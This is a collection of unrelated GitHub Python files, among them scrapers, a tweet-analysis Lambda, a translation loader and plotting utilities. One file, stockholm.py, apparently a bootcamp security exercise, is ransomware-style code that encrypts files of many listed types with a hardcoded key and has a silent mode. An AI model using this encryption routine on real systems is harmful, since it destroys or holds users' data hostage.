file_name_crop = os.path.join(self.down_path, '裁剪图', file_name)
self._img_crop(BytesIO(content), output_fullname=file_name_crop)
self.num += 1
async def _get_content(self, link, filename=False): # 传入的是图片连接
if link.startswith('//'): link = f'https:{link}'
async with aiohttp.ClientSession() as session:
# try:
async with session.get(url=link) as response:
content = await response.read()
extend = link.split('.')[-1]
if filename:
filename = f'{filename}.{extend}'
else:
filename = f'{self.num}.{extend}'
self._write_img(filename, content)
# except (asyncio.TimeoutError, ClientPayloadError):
# pass
def run(self, startpage=1, endpage=1):
"""
q:要查询的内容
startpange:开始爬取的页面,默认为1
endpage:结束页数,默认为1,如果此参数为0,那么就会下载全部页面的图片
"""
start = time.time()
if endpage == 0:
endpage = self.get_img_links(1, get_total_page=True)
print(f'总页数:{endpage}')
for page in range(startpage, endpage + 1): # 下载一百页的图片就能够了,或者本身更改页数
picurls = self.get_img_links(page) # 把那一页须要爬图片的连接传进去
# print(picurls)
if picurls:
# tasks = [asyncio.ensure_future(self.__download_img(picurl)) for picurl in picurls]
tasks_crop = [asyncio.ensure_future(self._get_content(d['big_path'], d['id'])) for d in picurls]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks_crop, return_exceptions=False))
end = time.time()
print(f"共运行了{(end - start):.0f}秒")
def _resize_image(self, infile, outfile='', minsize=300, is_file=True): # 把图片像素改成308
"""修改图片尺寸
:param infile: 图片源文件
:param outfile: 输出文件名,如果为空,那么直接修改原图片
:param minsize: min长宽
:return:
"""
im = Image.open(infile) if is_file else infile
if min(im.size) > minsize:
x, y = im.size
if x < y:
y = int(y * minsize / x)
x = minsize
else:
x = int(x * minsize / y)
y = minsize
im = im.resize((x, y), 1)
if not outfile:
outfile = infile
# 如果路径不存在,那么就创建
ckpath = os.path.dirname(outfile)
if not os.path.exists(ckpath):
os.makedirs(ckpath)
im.save(outfile)
def _img_crop(self, input_fullname, output_fullname):
img = Image.open(input_fullname)
图片大小 = img.size
比率 = 图片大小[0] / 图片大小[1]
图片宽 = 图片大小[0]
图片高 = 图片大小[1]
矩形边长 = (((图片宽 / 2) + (图片高 / 2)) * 2) / 4
# 横形图片矩形高=图片高*0.8v
x1 = x2 = y1 = y2 = 0
if 0.7 <= 比率 <= 1.4:
x1 = 图片宽 * 0.1
y1 = 图片高 - (矩形边长 + 图片高 * 0.1)
x2 = x1 + 矩形边长
y2 = 图片高 - (图片高 * 0.1)
elif 比率 < 0.7: # 竖的
x1 = 图片宽 * 0.05
y1 = 图片高 - (矩形边长 + 图片高 * 0.02)
x2 = x1 + 矩形边长
y2 = 图片高 - (图片高 * 0.02)
elif 比率 > 1.4: # 横的
x1 = 图片宽 * 0.02
y1 = 图片高 * 0.02
x2 = x1 + 矩形边长
y2 = y1 + 矩形边长
cropped = img.crop((x1, y1, x2, y2))
转换 = cropped.convert('RGB')
self._resize_image(转换, outfile=output_fullname, is_file=False)
def main():
down_path = r'd:\download'
spider = Spider(down_path)
spider.run(startpage=1, endpage=0)
print(f'共下载图片:{spider.num}')
if __name__ == '__main__':
main()
| chenxy2022/long | wow.py | wow.py | py | 7,151 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.mkdir",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
... |
8786926229 | from .abstract import Aggregator
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from bs4 import BeautifulSoup
from accagg.browser import Browser
from time import sleep
import re
from datetime import date
class Aggregator(Aggregator):
@classmethod
def bankid(self):
return self.__module__.split('.')[-1]
@classmethod
def description(self):
return "SBI Sumishin Net Bank"
@classmethod
def login_info(self):
return {'USRID': 'ID',
'PASSWORD': '暗証番号'}
def __decode_date(self, str):
match = re.match(r"^(\d+)年(\d+)月(\d+)日$", str)
if match:
y = int(match.group(1))
m = int(match.group(2))
d = int(match.group(3))
return date(y, m, d)
def _decode_amount(self, str):
if str[0] != '-':
str = '0' + str
return int('0' + str.replace(',', '').replace('円', ''))
def wait_until_blocked(self, b):
b.implicitly_wait(0)
for i in range(1, 20):
try:
print('try:%d' % i)
es = b.find_element_by_class_name('loadingServer')
except NoSuchElementException:
b.implicitly_wait(180)
return
sleep(0.5)
def run(self, login_info, lastdate):
URL = "https://www.netbk.co.jp"
self.__lastdate = lastdate
browser = Browser.firefox()
browser.implicitly_wait(180)
# open URL
browser.get(URL)
browser.wait_for_loaded()
# import pdb; pdb.set_trace()
# ログイン
browser.find_element_by_link_text("ログイン").click()
# enter
browser.sync_send_keys((By.NAME, 'userName'), login_info['USRID'])
browser.sync_send_keys((By.CSS_SELECTOR, 'input[type="password"]'), login_info['PASSWORD'])
# Click login
browser.find_element_by_css_selector('button[type="submit"]').click()
browser.wait_for_title_changed()
while not '住信' in browser.title:
sleep(0.1)
if '重要なお知らせ' in browser.title:
# 確認 (次へを押す)
browser.wait_element((By.LINK_TEXT, '次へ進む')).click()
browser.wait_for_loaded()
# ホーム
result = []
# import pdb; pdb.set_trace()
# 普通預金
data = self.__get_ordinary(browser)
if data:
result.extend(data)
# 円定期預金
data = self.__get_time_deposit(browser)
if data:
result.extend(data)
browser.quit()
return result
def __get_ordinary(self, browser):
# import pdb; pdb.set_trace()
# 入出金明細
self.wait_until_blocked(browser)
sleep(0.5)
e = browser.wait_element((By.LINK_TEXT, "入出金明細"))
browser.execute_script('arguments[0].click();', e)
self.wait_until_blocked(browser)
# 口座名取得
browser.wait_element((By.CSS_SELECTOR, '[nblabel="口座名"]'))
num = len(browser.find_elements_by_css_selector('[nblabel="口座名"] li'))
result = []
for i in range(0, num):
e = browser.find_element_by_css_selector('[nblabel="口座名"]')
e.click()
e = e.find_elements_by_css_selector('li')[i]
subname = e.text
e.click()
name = 'ordinary'
if i > 0:
name = name + '_' + subname
result.append({
'name': name,
'unit': 'Yen',
'account': '普通',
'history': self.__get_ordinary_sub(browser),
})
# print(result)
# ホームへ戻る
self.wait_until_blocked(browser)
browser.find_element_by_link_text('ホーム').click()
# wait for display
browser.wait_for_title_changed()
browser.wait_for_loaded()
browser.wait_element((By.LINK_TEXT, 'サイトマップ'))
return result
def __get_ordinary_sub(self, browser):
browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')).click()
browser.find_element_by_xpath('//label[contains(text(),"期間指定")]').click()
e = browser.find_elements_by_css_selector('.m-formSelectDate')[0]
e.find_element_by_css_selector('p.m-select-year nb-simple-select').click()
e.find_elements_by_css_selector('p.m-select-year li')[1].click()
e.find_element_by_css_selector('p.m-select-month nb-simple-select').click()
e.find_elements_by_css_selector('p.m-select-month li')[1].click()
e.find_element_by_css_selector('p.m-select-day nb-simple-select').click()
e.find_elements_by_css_selector('p.m-select-day li')[1].click()
# 表示
browser.find_elements_by_link_text('表示')[1].click()
# wait for update
browser.find_elements_by_partial_link_text('明細ダウンロード')
data = []
# import pdb; pdb.set_trace()
while True:
soup = BeautifulSoup(browser.page_source, "html.parser")
for row in soup.select('.m-tblDetailsBox'):
date = self.__decode_date(row.select('.m-date')[0].string)
if self.__lastdate > date:
return data
desc = row.select('.m-subject span')[0].string
deposit = self._decode_amount(row.select('.m-txtEx')[0].string)
if row.select('.m-sign')[0].string == '出':
deposit = -deposit
balance = self._decode_amount(row.select('.m-txtEx')[1].string)
item = {'date' : date,
'price': 1,
'amount' : deposit,
'payout' : deposit,
'desc' : desc,
'balance' : balance
}
# print(item)
# Prepend.
# Detail list is sorted by descending order
# Passbook order is ascending
data.insert(0, item)
# 次へリンクがあるかチェック
browser.implicitly_wait(0)
es = 0
try:
es = browser.find_element_by_css_selector('.m-pager-prev')
# print(es.get_attribute('outerHTML'))
except NoSuchElementException:
# print("no entry")
break
if not es:
break
browser.implicitly_wait(180)
next_page = es.text
es.click()
# wait for update
while browser.find_element_by_class_name('m-counter').text.split(' ')[0] != next_page:
sleep(0.1)
return data
def __get_time_deposit(self, browser):
# import pdb; pdb.set_trace()
browser.implicitly_wait(0)
es = 0
try:
es = browser.find_element_by_link_text('円預金・仕組預金')
except NoSuchElementException:
print("no entry")
return None
browser.implicitly_wait(180)
es.click()
sleep(0.5)
# 円定期預金
browser.find_element_by_link_text('円定期預金').click()
# 取引履歴
browser.find_element_by_link_text('取引履歴').click()
# 口座名取得
# browser.wait_element((By.CSS_SELECTOR, '[nblabel="口座名"]'))
num = len(browser.find_elements_by_css_selector('[nblabel="口座名"] li'))
result = []
for i in range(0, num):
# 口座切り替え
browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')).click()
e = browser.find_element_by_css_selector('[nblabel="口座名"]')
e.click()
e = e.find_elements_by_css_selector('li')[i]
subname = e.text
e.click()
# 並び順
# e = browser.find_element_by_css_selector('[nblabel="並び順"]')
# e.click()
# e = e.find_elements_by_css_selector('li')[1]
# e.click()
#
browser.find_element_by_partial_link_text('表示').click()
# 更新待ち
browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え'))
name = 'time_deposit'
if i > 0:
name = name + '_' + subname
result.append({
'name': name,
'unit': 'Yen',
'account': '普通',
'history': self.__get_time_deposit_sub(browser),
})
# print(result)
# ホームへ戻る
browser.find_element_by_link_text('ホーム').click()
# wait for display
browser.wait_for_title_changed()
browser.wait_for_loaded()
browser.wait_element((By.LINK_TEXT, 'サイトマップ'))
return result
def __get_time_deposit_sub(self, browser):
data = []
balance = 0
# ページ数取得
num = browser.find_element_by_css_selector('p.m-counter').text
num = int(num.split(' ')[2])
for i in range(1, num + 1):
if i != 1:
# ページ遷移
browser.find_element_by_link_text(str(i)).click()
self.wait_until_blocked(browser)
soup = BeautifulSoup(browser.page_source, "html.parser")
for row in soup.select('tr'):
c = [x for x in row.select('th p')[0].stripped_strings]
date = self.__decode_date(c[0])
# if self.__lastdate > date:
# break
desc = ' '.join(c[1:])
c = [x for x in row.select('td .m-txtEx')[0].stripped_strings]
deposit = self._decode_amount(c[1])
if c[0] == '出':
deposit = -deposit
balance += deposit
item = {'date' : date,
'price': 1,
'amount' : deposit,
'payout' : deposit,
'desc' : desc,
'balance' : balance
}
# print(item)
data.append(item)
return data
| t-bucchi/accagg | accagg/bank/sbinetbank.py | sbinetbank.py | py | 10,622 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.match",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "selenium.common.exceptions.NoSuchElementException",
"line_number": 52,
"usage_type": "name"
},
{
"api_name... |
5106024377 | import re
import json
import base64
import pandas as pd
import networkx as nx
from textblob import TextBlob
from collections import defaultdict
from arabic_reshaper import reshape
from bidi.algorithm import get_display
from requests_toolbelt.multipart import decoder
def generate_hashtag_data(file_path):
# Read the excel file
df = pd.read_excel(file_path)
# Define function to extract hashtags from each tweet
def extract_hashtags(text):
hashtags = re.findall(r'\#\w+', text)
return hashtags
# Create a list of all hashtags in the dataframe
all_hashtags = []
for tweet in df['Tweet']:
hashtags = extract_hashtags(tweet)
all_hashtags.extend(hashtags)
# Create a dictionary to store the frequency of each hashtag
frequency = {}
for hashtag in all_hashtags:
if hashtag in frequency:
frequency[hashtag] += 1
else:
frequency[hashtag] = 1
# Reshape and reorder the text
reshaped_text = {}
for k, v in frequency.items():
reshaped_k = reshape(k)
bidi_k = get_display(reshaped_k)
reshaped_text[bidi_k] = v
# Return the data
return {
"hashtag_frequency": frequency,
"reshaped_text": reshaped_text
}
def generate_sentiment_data(file_path):
# Load the data from Excel file
df = pd.read_excel(file_path)
# Define function to calculate sentiment polarity
def get_sentiment(text):
blob = TextBlob(text)
return blob.sentiment.polarity
# Create a dictionary to store sentiment values for each user
sentiments = defaultdict(list)
# Iterate over each row in the DataFrame
for index, row in df.iterrows():
# Get the user and tweet
user = row['User']
tweet = row['Tweet']
# Calculate sentiment polarity of the tweet
sentiment = get_sentiment(tweet)
# Append sentiment to the list of sentiments for the user
sentiments[user].append(sentiment)
# Create a list of sentiment data for each user
sentiment_data = []
for user in df['User'].unique():
user_sentiments = sentiments[user]
indices = list(range(1, len(user_sentiments) + 1))
sentiment_data.append(
{"user": user, "indices": indices, "sentiments": user_sentiments})
return sentiment_data
def generate_user_tweet_counts(file_path):
# Read the Excel file into a Pandas DataFrame
df = pd.read_excel(file_path)
# Group the data by user and count the number of tweets for each user
user_counts = df.groupby('User').size().reset_index(name='count')
# Convert the user_counts DataFrame into a list of dictionaries
user_tweet_counts = user_counts.to_dict('records')
return user_tweet_counts
def generate_user_mentions_graph_data(file_path):
# Load the Excel file into a Pandas DataFrame
df = pd.read_excel(file_path)
# Extract the usernames from the tweet column using regular expressions
df['username'] = df['Tweet'].str.extract(r'@(\w+)')
# Create a list of unique usernames
users = list(df['username'].dropna().unique())
# Create an empty directed graph using NetworkX
G = nx.DiGraph()
# Add nodes to the graph for each user
for user in users:
G.add_node(user)
# Add edges to the graph for each mention
for tweet in df['Tweet']:
# Find all mentions in the tweet using regular expressions
mentions = re.findall(r'@(\w+)', tweet)
# Create edges between the mentioned users
for i in range(len(mentions)):
for j in range(i+1, len(mentions)):
G.add_edge(mentions[i], mentions[j])
# Calculate the degree centrality of each node (user)
centrality = nx.degree_centrality(G)
# Sort the centrality dictionary by value in descending order
sorted_centrality = sorted(
centrality.items(), key=lambda x: x[1], reverse=True)
# Get the top 10 most influential users
top_users = [user[0] for user in sorted_centrality[:10]]
# Create a subgraph of the top users
H = G.subgraph(top_users)
# Create a dictionary containing the necessary data for the frontend
graph_data = {
'nodes': [node for node in H.nodes()],
'edges': [{'source': edge[0], 'target': edge[1]} for edge in H.edges()],
}
return graph_data
def generate_map_data(file_path):
# Load the data from the Excel file
data = pd.read_excel(file_path)
# Filter out rows without coordinates
data = data[data['coordinates'].notna()]
# Extract coordinates and create a list of dictionaries with lat and lon
coords_list = []
for i, row in data.iterrows():
coords_str = row['coordinates']
lon = float(coords_str.split(',')[0].split('=')[1])
lat = float(coords_str.split(',')[1].split('=')[1][:-1])
coords_list.append({'lat': lat, 'lon': lon})
# Return the coordinates data
return coords_list
headers = {
"Access-Control-Allow-Origin": "*", # Adjust the value according to your needs
"Access-Control-Allow-Headers": "Content-Type,X-Amz-Date,Authorization,X-Api-Key",
"Access-Control-Allow-Methods": "OPTIONS,GET,POST,PUT,PATCH,DELETE",
"Access-Control-Allow-Credentials": "true",
}
def handler(event, context):
# decode the multipart form data
decoded_str = base64.b64decode(event["body"])
content_type_header = event["headers"]["content-type"]
multipart_data = decoder.MultipartDecoder(
decoded_str, content_type_header)
# get the file data from the multipart data
file = multipart_data.parts[0]
# print the file name
print(file.headers[b'Content-Disposition'].decode().split(';')[1])
# generate hashtag data
hashtag_data = generate_hashtag_data(file.content)
# generate sentiment data
sentiment_data = generate_sentiment_data(file.content)
# generate user tweet counts
user_tweet_counts = generate_user_tweet_counts(file.content)
# generate user mentions graph data
user_mentions_graph_data = generate_user_mentions_graph_data(file.content)
# generate map data
map_data = generate_map_data(file.content)
# return the response
return {
"statusCode": 200,
"headers": headers,
"body": json.dumps({
"hashtag_data": hashtag_data,
"sentiment_data": sentiment_data,
"user_tweet_counts": user_tweet_counts,
"user_mentions_graph_data": user_mentions_graph_data,
"map_data": map_data
})
}
| kashif-ghafoor/twitter-scrap-infa | src/hashtagAnalysis/index.py | index.py | py | 6,609 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_excel",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "arabic_reshaper.reshape",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "bidi.algorithm.g... |
18935365420 | # pylint: disable=too-many-locals, duplicate-code
"""Management command that loads locale .po files into database."""
from __future__ import unicode_literals
import json
from os.path import join, isdir
from django.conf import settings
from django.core.management.base import BaseCommand as LoadCommand, CommandError
from django.apps import apps
from babel.messages.pofile import read_po
def setattr_by_json_path(json_object, path, value):
"""Recursive function that sets a string value given a JSON xpath."""
first_id = path.find("#")
second_id = path.find("#", first_id + 1)
first_key = path.find("/")
second_key = path.find("/", first_key + 1)
indices = [x for x in [first_id, second_id, first_key, second_key] if x > 0]
indices.sort()
indices.append(len(path) + 1)
if path[0] == "#" and isinstance(json_object, list):
child_id = path[1:indices[0]]
path_remainder = path[indices[0]:]
for sub_object in json_object:
try:
if sub_object["id"] == child_id:
setattr_by_json_path(sub_object, path_remainder, value)
except KeyError:
pass
elif path[0] == "/" and isinstance(json_object, dict):
child_key = path[1:indices[0]]
path_remainder = path[indices[0]:]
try:
sub_object = json_object[child_key]
if isinstance(sub_object, str):
json_object[child_key] = value
else:
setattr_by_json_path(sub_object, path_remainder, value)
except KeyError:
pass
return json_object
class Command(LoadCommand):
"""Management command that loads locale .po files into database."""
def handle(self, *args, **options):
"""Handle the load_trans command."""
po_filename = "nav.po"
locale_path = settings.MODELTRANSLATION_LOCALE_PATH
if not isdir(locale_path):
raise CommandError("Locale directory does not exists.")
for lang in [lang_tup[0] for lang_tup in list(settings.LANGUAGES)]:
if lang != "en":
lang_path = join(locale_path, lang)
if not isdir(lang_path):
raise CommandError("Language directory does not exists.")
po_file = open(join(lang_path, "LC_MESSAGES", po_filename), "r", encoding="utf-8")
catalog = read_po(po_file)
po_file.close()
for message in catalog:
if message.string not in [None, "None", ""] and message.auto_comments:
for field_id in message.auto_comments:
[app, class_name, primary_key, field, json_path] = field_id.split('.')
model = apps.get_model(app, class_name)
try:
obj = model.objects.get(pk=primary_key)
except model.DoesNotExist:
continue
if json_path == "":
setattr(obj, field, message.string)
obj.save()
else:
msg_data = getattr(obj, field).raw_data
tr_json_path = "%s_%s" % (json_path[:-3], lang)
msg_data = setattr_by_json_path(msg_data, tr_json_path, message.string)
setattr(obj, field, json.dumps(msg_data))
obj.save()
| IATI/IATI-Standard-Website | modeltranslation_sync/management/commands/load_trans_nav.py | load_trans_nav.py | py | 3,582 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "django.conf.settings.MODELTRANSLATION_LOCALE_PATH",
"line_number": 53,
"usage_type": "attribute"
},
{
"api_name": "django.conf.settings",
"line_number": 53,
... |
44638762028 | # **************************************************************************** #
# #
# ::: :::::::: #
# stockholm.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: mariza <mariza@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2023/05/10 09:46:33 by mariza #+# #+# #
# Updated: 2023/05/30 09:56:06 by mariza ### ########.fr #
# #
# **************************************************************************** #
import argparse
import os
import os.path
from cryptography.fernet import Fernet
RUTA = '/Users/mariza/Desktop/repo-terminados-bootcamp/stockholm/home/infection'
KEY = 'PyMEtpcBTPNHI7y_wlN1dHK_K_NElzbGeYT92ksziJo='
parser = argparse.ArgumentParser()
parser.add_argument ('-v', '--version', dest = 'v', action = 'store_true', help = 'muestra la version del programa')
parser.add_argument ('-r', '--reverse', dest = 'r', type = str , help = 'revierte la infeccion')
parser.add_argument ('-s', '--silent', dest = 's', action = "store_true", help = 'hace la infeccion sin hacer ningun output')
parser.add_argument ('-f', type = str, default = RUTA, help = 'manda los archivos a una carpeta especifica')
args = parser.parse_args()
def new_ext(ruta):
##añadiendo la extension del archivo a .ft
ext = (".der", ".pfx", ".key", ".crt", ".csr", ".p12", ".pem", ".odt",
".ott", ".sxw", ".stw", ".uot", ".3ds", ".max", ".3dm", ".ods",
".ots", ".sxc", ".stc", ".dif", ".slk", ".wb2", ".odp", ".otp",
".sxd", ".std", ".uop", ".odg", ".otg", ".sxm", ".mml", ".lay",
".lay6", ".asc", ".sqlite3", ".sqlitedb", ".sql", ".accdb",
".mdb", ".db", ".dbf", ".odb", ".frm", ".myd", ".myi", ".ibd",
".mdf", ".ldf", ".sln", ".suo", ".cs", ".c", ".cpp", ".pas", ".h",
".asm", ".js", ".cmd", ".bat", ".ps1", ".vbs", ".vb", ".pl",
".dip", ".dch", ".sch", ".brd", ".jsp", ".php", ".asp", ".rb",
".java", ".jar", ".class", ".sh", ".mp3", ".wav", ".swf", ".fla",
".wmv", ".mpg", ".vob", ".mpeg", ".asf", ".avi", ".mov", ".mp4",
".3gp", ".mkv", ".3g2", ".flv", ".wma", ".mid", ".m3u", ".m4u",
".djvu", ".svg", ".ai", ".psd", ".nef", ".tiff", ".tif", ".cgm",
".raw", ".gif", ".png", ".bmp", ".jpg", ".jpeg", ".vcd", ".iso",
".backup", ".zip", ".rar", ".7z", ".gz", ".tgz", ".tar", ".bak",
".tbk", ".bz2", ".PAQ", ".ARC", ".aes", ".gpg", ".vmx", ".vmdk",
".vdi", ".sldm", ".sldx", ".sti", ".sxi", ".602", ".hwp", ".snt",
".onetoc2", ".dwg", ".pdf", ".wk1", ".wks", ".123", ".rtf", ".csv",
".txt", ".vsdx", ".vsd", ".edb", ".eml", ".msg", ".ost", ".pst",
".potm", ".potx", ".ppam", ".ppsx", ".ppsm", ".pps", ".pot", ".pptm",
".pptx", ".ppt", ".xltm", ".xltx", ".xlc", ".xlm", ".xlt", ".xlw",
".xlsb", ".xlsm", ".xlsx", ".xls", ".dotx", ".dotm", ".dot", ".docm",
".docb", ".docx", ".doc")
for x in os.listdir(ruta):
ruta_archivo = os.path.join(ruta, x)
if os.path.isfile(ruta_archivo) and os.path.splitext(x)[1] in ext:
nueva_extension = x + '.ft'
nueva_ruta_del_archivo = os.path.join(ruta, nueva_extension)
os.rename(ruta_archivo, nueva_ruta_del_archivo)
##encripto los archivos de la carpetab
def wannacry(silent=False):
fernet = Fernet(KEY)
ext = (".der", ".pfx", ".key", ".crt", ".csr", ".p12", ".pem", ".odt",
".ott", ".sxw", ".stw", ".uot", ".3ds", ".max", ".3dm", ".ods",
".ots", ".sxc", ".stc", ".dif", ".slk", ".wb2", ".odp", ".otp",
".sxd", ".std", ".uop", ".odg", ".otg", ".sxm", ".mml", ".lay",
".lay6", ".asc", ".sqlite3", ".sqlitedb", ".sql", ".accdb",
".mdb", ".db", ".dbf", ".odb", ".frm", ".myd", ".myi", ".ibd",
".mdf", ".ldf", ".sln", ".suo", ".cs", ".c", ".cpp", ".pas", ".h",
".asm", ".js", ".cmd", ".bat", ".ps1", ".vbs", ".vb", ".pl",
".dip", ".dch", ".sch", ".brd", ".jsp", ".php", ".asp", ".rb",
".java", ".jar", ".class", ".sh", ".mp3", ".wav", ".swf", ".fla",
".wmv", ".mpg", ".vob", ".mpeg", ".asf", ".avi", ".mov", ".mp4",
".3gp", ".mkv", ".3g2", ".flv", ".wma", ".mid", ".m3u", ".m4u",
".djvu", ".svg", ".ai", ".psd", ".nef", ".tiff", ".tif", ".cgm",
".raw", ".gif", ".png", ".bmp", ".jpg", ".jpeg", ".vcd", ".iso",
".backup", ".zip", ".rar", ".7z", ".gz", ".tgz", ".tar", ".bak",
".tbk", ".bz2", ".PAQ", ".ARC", ".aes", ".gpg", ".vmx", ".vmdk",
".vdi", ".sldm", ".sldx", ".sti", ".sxi", ".602", ".hwp", ".snt",
".onetoc2", ".dwg", ".pdf", ".wk1", ".wks", ".123", ".rtf", ".csv",
".txt", ".vsdx", ".vsd", ".edb", ".eml", ".msg", ".ost", ".pst",
".potm", ".potx", ".ppam", ".ppsx", ".ppsm", ".pps", ".pot", ".pptm",
".pptx", ".ppt", ".xltm", ".xltx", ".xlc", ".xlm", ".xlt", ".xlw",
".xlsb", ".xlsm", ".xlsx", ".xls", ".dotx", ".dotm", ".dot", ".docm",
".docb", ".docx", ".doc")
try:
for x in os.listdir(RUTA):
name_archivo, ext_archivo = os.path.splitext(x)
with open(os.path.join(RUTA, x), 'rb') as f:
datos = f.read()
if os.path.splitext(x)[1] in ext:
archivo_encriptado = fernet.encrypt(datos)
with open(os.path.join(RUTA, name_archivo + ext_archivo), 'wb') as f:
f.write(archivo_encriptado)
if not silent:
print(f'El archivo {x} ha sido encriptado')
except:
print('La carpeta home no exite.')
# new_ext(RUTA)
##desencripto los archivos de la carpeta que tengan la extension .ft
def desencriptado_archivos(key, file, silent=False):
try:
if not os.path.exists(file):
os.makedirs(file)
fernet = Fernet(key)
for x in os.listdir(RUTA):
if x.endswith('.ft'):
archivo = os.path.join(RUTA, x)
with open(archivo, 'rb') as f:
datos_archivo = f.read()
descifrado = fernet.decrypt(datos_archivo)
with open(os.path.splitext(os.path.join(file, x))[0], 'wb') as f:
f.write(descifrado)
if not silent:
print(f'El archivo {x} ha sido desencriptado')
except:
print('La clave introducida no es válida')
if __name__ == '__main__':
if args.r:
desencriptado_archivos(args.r, args.f, args.s)
elif args.v:
print('version 1.0')
else:
wannacry(args.s)
| Mankestark/Proyectos-terminados-bootcamp-ciberseguridad | stockholm/stockholm.py | stockholm.py | py | 7,398 | python | uk | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_n... |
8111739008 | import pygame, sys
from pygame.locals import *
class Particle(object):
#Initalizes the paritcle object (called when it is first created)
def __init__(self,X,Y,size,deltaX,deltaY,color, displaySurface):
#surface to display the particle on
self.displaySurface = displaySurface
#color to make the particle
self.color = color
#how fast it moves on the X axis
self.deltaX = deltaX
#how far it moves on the Y axis
self.deltaY = deltaY
#create the particle rectangle
self.rectangle = pygame.Rect(X,Y, size , size)
#function to draw the particle image on the displaysurface
def draw(self):
#draw the particle
pygame.draw.rect(self.displaySurface,
self.color, self.rectangle)
#move the particle so it is in a
#new location next time we draw
self.rectangle.x = self.rectangle.x + self.deltaX
self.rectangle.y = self.rectangle.y + self.deltaY
def setColor(self,color):
#color to make the particle
self.color = color | arnavdani/Python-2015-Summer | MyClasses/Particle.py | Particle.py | py | 1,136 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.Rect",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pygame.draw.rect",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "pygame.draw",
"line_number": 22,
"usage_type": "attribute"
}
] |
37369375965 | import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
"""
iterate csv boxes in /box_4096 and convert them to images
"""
# boxfiles_dir = 'data/box_4096'
# des_dir='data/allsolar_png1500_boximage'
boxfiles_dir = 'data/box_full_4096'
des_dir='data/allsolar_full_png512_boximage'
if not os.path.exists(des_dir):
os.makedirs(des_dir)
"""
read an image to get the shape
"""
# shape_img=cv2.imread("data/allsolar_png512/20120601_0000_full_0.png").shape
shape_img=cv2.imread("data/allsolar_full_png512/20120101_0000_full_0.png").shape
shape=(4096,4096)
allFileNames = os.listdir(boxfiles_dir)
allFileNames=[ filename for filename in allFileNames if filename.endswith( '.csv' ) ]
for boxfile in allFileNames:
boxdf=pd.read_csv(os.path.join(boxfiles_dir,boxfile),header=None)
rows=boxdf.iloc[:,-4:].to_numpy()
image = np.zeros((shape))
for xmin, ymin, xmax, ymax in rows:
try:
xmin, ymin, xmax, ymax=round(xmin),4096-round(ymin),round(xmax),4096-round(ymax)
except:
print("error "+ boxfile)
continue #go to next for loop
num_channels = 1 if len(image.shape) == 2 else image.shape[2]
cv2.rectangle(image, (xmin, ymin), (xmax, ymax), color=(256,) * num_channels, thickness=-10)
image=cv2.resize(image, shape_img[0:2])
cv2.imwrite(os.path.join(des_dir,boxfile.split("box")[0]+"mask.png"), image)
| dyu62/solar_share | data/box2img.py | box2img.py | py | 1,426 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number... |
25978420324 | from enum import Enum
class ProxyResponseType(Enum):
proxy = 'proxy'
file = 'file'
json = 'json'
def get_dict(self):
return self.value
class ProxyResponse(object):
def __init__(self,
request,
response,
type: ProxyResponseType,
status_code: int,
headers: dict,
body: any):
self.request = request
self.response = response
self.type = type
self.status_code = status_code
self.headers = headers
self.body = body
def get_dict(self):
return {
'type': self.type.value,
'status_code': self.status_code,
'headers': self.headers,
'body': self.body,
}
| sayler8182/MockServer | app/models/models/proxy_response.py | proxy_response.py | py | 793 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 4,
"usage_type": "name"
}
] |
40272343197 | from __future__ import absolute_import, division, print_function
import base64
import json
import os
import time
import requests
import urllib.request
from urllib.request import Request, urlopen
from uuid import UUID
from beets import config
import beets.library
from beets.plugins import BeetsPlugin
from pathlib import Path
from lxml import etree as et
import simplejson
audio_db_key = '195010'
artist_tags = ['name', 'musicBrainzArtistID', 'sortname', 'genre', 'style',
'mood', 'born', 'formed', 'biography', 'died', 'disbanded']
album_tags = ['title', 'musicBrainzAlbumID', 'artist', 'genre', 'style',
'mood', 'theme', 'compilation', 'review', 'type', 'releasedate',
'label', 'rating', 'year']
emptyalbum = '''{"album":[{"idAlbum":"","idArtist":"","idLabel":"",
"strAlbum":"","strAlbumStripped":"","strArtist":"",
"intYearReleased":"","strStyle":"","strGenre":"","strLabel":"",
"strReleaseFormat":"","intSales":"","strAlbumThumb":"",
"strAlbumThumbBack":"","strAlbumCDart":"","strAlbumSpine":"",
"strDescriptionEN":"","strDescriptionDE":"",
"strDescriptionFR":"","strDescriptionCN":"",
